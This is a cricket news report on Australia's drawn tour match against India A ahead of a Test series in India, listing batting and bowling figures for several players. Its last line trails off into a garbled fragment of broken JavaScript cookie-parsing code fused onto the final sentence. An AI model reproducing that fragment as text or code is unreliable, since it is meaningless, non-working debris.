Australia has had its final hit out before embarking on the daunting task of trying to beat India on Indian soil in a four-match Test series.

The Aussies completed a three-day tour match against India A over the weekend, with mixed results for the side's fringe players.

Captain Steve Smith retired on 107 during Australia's first innings, as the visitors reached 7-469 declared. Shaun Marsh, who batted at No.4, with Renshaw and Warner opening, scored 104, before retiring, while brother, Mitch Marsh, scored 75.

Matthew Wade also notched a half century, scoring 64, while Peter Handscomb also got some valuable time in the middle, scoring 45.

However, the news was not as good for all-rounder, Glenn Maxwell. The Victorian scored 16 not out in the first innings, but was dismissed for just one in the second innings. He was also only given six overs with the ball, during which he conceded 26 runs and was handled with relative ease by the Indian batsmen.

Young opener Matt Renshaw also struggled, scoring 11 and 10 in his two innings, while David Warner scored 25 and 35.

With the ball, Nathan Lyon and Steve O'Keefe took the bulk of the wickets claiming seven scalps between them, as Australia dismissed India A for 403 in 91.5 overs.

O'Keefe finished with figures of 3-101 from 24 overs, while Lyon claimed 4-162 from 28.5 overs.

The Aussies then reached 4-110 in their second dig, as the match ended in a draw.

Australia has a further two days to prepare for the first Test against India, which begins in Pune, on February 23. "(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));(U[1]):"",();||void 0===time){/1e3+86400),.('')}
